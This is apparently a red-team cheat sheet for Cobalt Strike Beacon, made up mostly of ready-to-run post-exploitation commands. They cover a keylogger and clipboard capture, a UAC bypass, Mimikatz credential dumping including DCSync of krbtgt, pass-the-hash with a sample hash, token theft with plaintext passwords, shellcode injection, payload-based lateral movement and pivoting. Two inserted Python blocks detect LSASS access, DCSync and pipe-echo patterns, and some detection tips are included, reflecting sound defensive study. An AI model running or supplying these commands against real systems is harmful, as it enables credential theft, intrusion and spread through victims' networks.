Beacon Commands

1. Basics:

getuid --> who we are

getprivs --> privileges

net logons --> user sessions

run klist --> see available Kerberos tickets

help sleep --> control how often the beacon calls home

- Files

ls <C:\Path> --> List the files in the specified directory

cd [directory] --> Change into the specified working directory

rm [file\folder] --> Delete a file or folder

cp [src] [dest] --> File copy

download [C:\filePath] --> Download a file from the path on the Beacon host

downloads --> Lists downloads in progress

cancel [*file*] --> Cancel a download currently in progress

upload [/path/to/file] --> Upload a file from the attacker to the current Beacon host

- Powershell and .NET

powershell-import [/path/to/script.ps1] --> Import a PowerShell .ps1 script from the control server and save it in memory in Beacon

powershell [cmdlet] [arguments] --> Set up a local TCP server bound to localhost, download the script imported above via powershell.exe, then execute the specified function with any arguments and return the output.

powerpick [cmdlet] [arguments] --> Launch the given function using Unmanaged PowerShell, which does not start powershell.exe. The host program is set by spawnto.

powerpick $ExecutionContext.SessionState.LanguageMode --> escape from PowerShell Constrained Language Mode (CLM); this prints the language mode of the unmanaged runspace

psinject [pid] [arch] [cmdlet] [arguments] --> Inject Unmanaged PowerShell into a specific process and execute the specified command. This is useful for long-running PowerShell jobs.

execute-assembly {location of the binary in attacker machine} --> Run a local .NET executable as a Beacon post-exploitation job.

If a large tool run with execute-assembly fails because the task size is over the maximum, either reduce the tool's size or enlarge Beacon's task size by adding set tasks_max_size "2097152"; to the top of the C2 profile.

2. Host Reconnaissance:

- List running processes on a system

ps

- Screenshots:

printscreen --> Take a single screenshot via the PrintScr method

screenshot --> Take a single screenshot

screenwatch --> Take periodic screenshots of the desktop

To see all the screenshots that have been taken, go to View > Screenshots

- Keylogger

keylogger

All keystrokes can be seen at View > Keystrokes.

The keylogger runs as a job that can be stopped with the jobkill command.

- Clipboard

clipboard

The clipboard command will capture any text from the user's clipboard.

This is a one-off command (it does not run as a job) and dumps the content directly to the Beacon console.

- User Sessions

net logons

2. Privilege Escalation

- User Account Control (UAC) Bypasses:

Run whoami /groups to check the integrity level. If the process is running at Medium Mandatory Level, even an administrator account is blocked from privileged actions such as creating a new user: the command displays an error and the program has to be right-clicked and run as administrator, which causes a UAC prompt to appear.

Beacon has a few built-in UAC bypasses and a few more which are provided via the Elevate Kit (https://github.com/cobalt-strike/ElevateKit)

elevate uac-schtasks {tcp-local listener}

After that, Command Prompt will have sufficient privileges to make system configuration changes, as it will now be running in "high integrity".

3. Mimikatz

! The Mimikatz built into Cobalt Strike by default is not recent enough to work on later versions of Windows, so we will need the Mimikatz Kit (https://github.com/gentilkiwi/mimikatz).

There are some differences in how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands where the second depends on state set up by the first.

Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon. Example:

beacon> mimikatz token::elevate ; lsadump::sam

Beacon also has its own command convention using the ! and @ symbols as "modifiers".

The ! elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate.

The @ impersonates Beacon's thread token before running the given command, which is useful in cases where Mimikatz needs to interact with a remote system, such as with dcsync. This is also compatible with other impersonation primitives such as make_token and steal_token.

In this section we will use the ! and @ modifiers described before and the dedicated commands for some mimikatz modules, helping us improve the results from the normal mimikatz described in Privesc and Post-exploitation/Windows Post-Exploitation/Credential Theft/Mimikatz.

- NTLM Hashes (This command requires elevated privileges)

This module will open a read handle to LSASS which can be logged under event 4656. Use the "Suspicious Handle to LSASS" saved search in Kibana to see them.

mimikatz !sekurlsa::logonpasswords

Cobalt Strike also has a short-hand command for this called logonpasswords. After dumping these credentials, go to View > Credentials to see a copy of them.

- Kerberos Encryption Keys (This command requires elevated privileges)

This module also opens a read handle to LSASS.

mimikatz !sekurlsa::ekeys

- Security Account Manager (This command requires elevated privileges)

This module will open a handle to the SAM registry hive. Use the "Suspicious SAM Hive Handle" saved search in Kibana to see them.

mimikatz !lsadump::sam

- Domain Cached Credentials (This command requires elevated privileges)

This module will open a handle to the SECURITY registry hive. Use the "Suspicious SECURITY Hive Handle" saved search in Kibana to see them.

mimikatz !lsadump::cache

- DCSync (This requires GetNCChanges which is usually only available to domain admins)

Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.

Directory replication can be detected if Directory Service Access auditing is enabled, by searching for 4662 events where the identifying GUID is 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (for DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set).
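The two log-based detections in these notes, the 4656 read handle to LSASS (sekurlsa modules) and the 4662 directory-replication access (DCSync), can be triaged with the same event-filtering logic. The block below is an added example written for these notes, not Cobalt Strike or Mimikatz code; it models Security events as flat dicts with the standard field names (EventID, SubjectUserName, ObjectName, ProcessName, Properties), uses constructed sample records, and assumes a constructed allowlist of processes that legitimately open LSASS. It also includes the separate GUID for DS-Replication-Get-Changes-All (1131f6ad-...), which is the published extended-right GUID and is not quoted in the notes above.

```python
"""Added example (not part of the original notes): filter Windows Security
events for a handle request on lsass.exe (4656) and for directory
replication rights in a 4662 Directory Service Access event (DCSync)."""
import re

# Extended-right GUIDs that indicate directory replication. The first and
# last are the ones quoted in the notes; the middle one is the published
# GUID for DS-Replication-Get-Changes-All.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed allowlist (assumption): processes expected to hold LSASS handles.
LSASS_HANDLE_ALLOWLIST = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")


def find_lsass_handle_requests(events):
    """Return 4656 events whose target object is lsass.exe and whose
    requesting process is not on the allowlist."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4656:
            continue
        if not ev.get("ObjectName", "").lower().endswith(r"\lsass.exe"):
            continue
        if ev.get("ProcessName", "").lower() in LSASS_HANDLE_ALLOWLIST:
            continue
        hits.append(ev)
    return hits


def find_replication_requests(events):
    """Return (event, [right names]) for 4662 events that request any of the
    replication extended rights from a non-machine account. Machine accounts
    (names ending in '$') are skipped because domain controllers replicate
    legitimately; treating them as benign is an assumption to tune locally."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if ev.get("SubjectUserName", "").endswith("$"):
            continue
        guids = GUID_RE.findall(ev.get("Properties", "").lower())
        rights = [REPLICATION_GUIDS[g] for g in guids if g in REPLICATION_GUIDS]
        if rights:
            hits.append((ev, rights))
    return hits


# Constructed sample events for demonstration; not real log data.
SAMPLE_EVENTS = [
    {"EventID": 4656, "SubjectUserName": "nlamb",
     "ObjectName": r"\Device\HarddiskVolume2\Windows\System32\lsass.exe",
     "ProcessName": r"C:\Windows\Temp\update.exe"},
    {"EventID": 4656, "SubjectUserName": "SYSTEM",
     "ObjectName": r"\Device\HarddiskVolume2\Windows\System32\lsass.exe",
     "ProcessName": r"C:\Windows\System32\csrss.exe"},
    {"EventID": 4656, "SubjectUserName": "nlamb",
     "ObjectName": r"C:\Users\nlamb\Documents\notes.txt",
     "ProcessName": r"C:\Windows\System32\notepad.exe"},
    {"EventID": 4662, "SubjectUserName": "DC01$",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "nlamb",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "nlamb",
     # constructed placeholder GUID that is not a replication right
     "Properties": "{aaaaaaaa-0000-0000-0000-000000000001}"},
]

if __name__ == "__main__":
    for ev in find_lsass_handle_requests(SAMPLE_EVENTS):
        print("LSASS handle:", ev["SubjectUserName"], ev["ProcessName"])
    for ev, rights in find_replication_requests(SAMPLE_EVENTS):
        print("Replication:", ev["SubjectUserName"], ", ".join(rights))
```

Both filters key on fields that are present regardless of which tool made the request, so they catch the sekurlsa and dcsync commands above as well as any other client performing the same operations; tune the allowlist and the machine-account exclusion against a baseline of normal activity in your own environment.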

Example to extract the NTLM and AES keys for the krbtgt account using lamb (a domain admin):

make_token DEV\nlamb F3rrari

dcsync dev.example.io DEV\krbtgt

- DPAPI (Credential Manager)

To get master key:

First option (local admin access on the machine and if the key is cached in LSASS):

mimikatz !sekurlsa::dpapi

Second option (MS-BKRP; this must be executed in the context of the user who owns the key, so if we are running as another user or as SYSTEM we must use the @ modifier):

mimikatz @dpapi::masterkey /in:C:\Users\user\AppData\Roaming\Microsoft\Protect\{SID: S-X-X-XX-}\{masterkeyGUID} /rpc

Then to decrypt it:

mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}

Then we can impersonate the user (make token).

- DPAPI (Scheduled Task Credentials)

ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\{BLOB}

mimikatz !sekurlsa::dpapi

mimikatz dpapi::cred /in:C:\Users\User\AppData\Local\Microsoft\Credentials\{BLOB} /masterkey:{key_obtained}

Then we can impersonate the user (make token).

4. User Impersonation

- Pass the Hash:

Beacon has a dedicated pth command which executes Mimikatz in the background. Example:

pth DEV\paco 59fc0f884922b4ce376051134c71e22c

To "drop" impersonation afterwards, use the rev2self command.

Two opportunities to detect PTH are the R/W handle to LSASS; and looking for the echo foo > \\.\pipe\bar pattern in command-line logs.
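The second detection opportunity above, the echo-to-named-pipe pattern, is a plain command-line match. The block below is an added example for these notes, not code from Cobalt Strike or Mimikatz; it assumes process-creation logs exported as "timestamp | host | user | command line" lines (a constructed format) and flags any command line that echoes a token into \\.\pipe\<name>.

```python
"""Added example (not part of the original notes): find the
'echo <token> > \\.\pipe\<name>' pattern in process command-line logs."""
import re

# Case-insensitive match for:  echo <token> > \\.\pipe\<pipe name>
PIPE_ECHO_RE = re.compile(r"echo\s+(\S+)\s*>\s*\\\\\.\\pipe\\(\S+)", re.IGNORECASE)


def parse_line(line):
    """Split a constructed 'ts | host | user | cmdline' record into a dict."""
    parts = line.split(" | ", 3)
    if len(parts) != 4:
        return None
    ts, host, user, cmdline = parts
    return {"ts": ts, "host": host, "user": user, "cmdline": cmdline}


def find_pipe_echo_commands(lines):
    """Return one dict per command line matching the named-pipe echo pattern,
    carrying host, user, the echoed token and the pipe name. The
    'token_matches_pipe' flag notes when the same value is used for both,
    which is how the pattern appears in the notes above."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        m = PIPE_ECHO_RE.search(rec["cmdline"])
        if not m:
            continue
        token, pipe = m.group(1), m.group(2)
        hits.append({
            "ts": rec["ts"],
            "host": rec["host"],
            "user": rec["user"],
            "token": token,
            "pipe": pipe,
            "token_matches_pipe": token.lower() == pipe.lower(),
        })
    return hits


# Constructed sample log; hostnames, users and values are made up.
SAMPLE_LOG = r"""2024-05-02T10:14:03Z | WKSTN-1 | DEV\nlamb | "C:\Windows\system32\cmd.exe" /c echo 7f3a1c > \\.\pipe\7f3a1c
2024-05-02T10:14:09Z | WKSTN-1 | DEV\nlamb | powershell.exe -nop -w hidden Get-Process
2024-05-02T10:15:41Z | SRV-2 | DEV\svc_backup | cmd.exe /c echo done > C:\Temp\backup.log
2024-05-02T10:16:12Z | SRV-2 | NT AUTHORITY\SYSTEM | CMD.EXE /C ECHO ab12 > \\.\PIPE\ab12"""

if __name__ == "__main__":
    for hit in find_pipe_echo_commands(SAMPLE_LOG.splitlines()):
        print(hit["ts"], hit["host"], hit["user"], "pipe:", hit["pipe"])
```

The redirect to a file (third sample line) is deliberately left unmatched: the signal is the \\.\pipe\ target, not the echo itself. Pair a hit with the LSASS handle event from the same host and time window before escalating.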

Alternatively, pass-the-hash can be done manually with Mimikatz: start an arbitrary process with the hash and then steal its token.

- Token Impersonation

For pass-the-ticket attacks, or if we elevate or land on a system where a user is running a process, to impersonate its token:

steal_token {pid}

- Token Store

This is an evolution on the steal_token command which allows you to steal and store tokens for future use:

token-store steal {pid}

To list all the tokens in the store:

token-store show

To impersonate one:

token-store use {id}

The rev2self command will drop the impersonation token, but it will remain in the store so that it can be impersonated again. A token can be removed from the store using token-store remove {id} or the entire store flushed with token-store remove-all.

Each Beacon has its own token store. You cannot transfer tokens from one Beacon to another, even if they're on the same host.

- Make Token

This command allows you to impersonate a user if you know their plaintext password. Example:

make_token DEV\paco Qwerty123

To leverage a ms-Mcs-AdmPwd (LAPS):

make_token .\LapsAdmin {ms-mcs-admpwd}

This technique behaves in the same way as runas /netonly, so it may be difficult to distinguish legitimate from malicious events.

The logon session created with LogonUserA has the same local identifier as the caller but the alternate credentials are used when accessing a remote resource.

This also means that make_token is not applicable to anything you may want to run on the current machine. For that, spawnas may be a better solution.

- Process Injection

Beacon has two main injection commands:

shinject allows you to inject any arbitrary shellcode from a binary file on your attacking machine

inject will inject a full Beacon payload for the specified listener.

inject {pid} {arch} {listener}

Example:

inject 4464 x64 tcp-local

The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.

If the user closes this process, the Beacon will be lost. The injected shellcode uses the ExitThread function, so exiting the Beacon won't kill the host process.

5. Lateral Movement

jump [method] [target] [listener]

remote-exec [method] [target] [command]

- Windows Remote Management

The winrm and winrm64 methods can be used for 32 and 64-bit targets as appropriate.

The SMB Beacon is an excellent choice when moving laterally, because the SMB protocol is used extensively in a Windows environment, so this traffic blends in very well. Example:

jump winrm64 web.dev.cyberbotic.io smb

- PsExec

The psexec / psexec64 commands work by uploading a service binary to the target system, then creating and starting a Windows service to execute that binary. Beacons executed this way run as SYSTEM. Example:

jump psexec64 web.dev.cyberbotic.io smb

psexec_psh doesn't copy a binary to the target, but instead executes a PowerShell one-liner (always 32-bit). Example:

jump psexec_psh web smb

- Windows Management Instrumentation (WMI)

The most straightforward way to use this is to upload a payload to the target system and use WMI to execute it.

cd \\web.dev.cyberbotic.io\ADMIN$

upload C:\Payloads\smb_x64.exe

remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe

The process is now running on the target so now we need to connect to it.

link {target} {pipe name}

link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10

Because of CoInitializeSecurity, WMI may fail with access denied, so WMI execution needs to come from a different process. This can be achieved with commands such as spawn and spawnas, or even execute-assembly with a tool such as SharpWMI (Exploitation/Active Directory/Attacks and more/Lateral Movement/In Windows/WMI/SharpWMI).

6. Pivoting

portscan {IP} {port} --> To see if a target has a port open or not

- SOCKS Proxies

Use the socks command on the Beacon that you want to act as the pivot point.

To start a SOCKS4a proxy simply run:

socks 1080

For SOCKS5:

socks 1080 socks5 disableNoAuth socks_user socks_password enableLogging

You will then see port 1080 bound on the team server VM.

- Reverse Port Forwards

rportfwd command. Example (bind port 8080 on the Beacon host and tunnel the traffic back to our C2 listener on port 80):

rportfwd 8080 127.0.0.1 80

So if we want to access a file hosted on our team server's port 80 from a machine we have no direct connection with, instead of trying to download http://attacker.com/a we access http://{ip or name of the machine where we have the Beacon and have applied the port forward}:8080/a.

! Before creating a port forward, add a rule to the Windows Firewall (Tunneling/Port Forwarding/Chisel Port Forwarding/Windows Firewall).
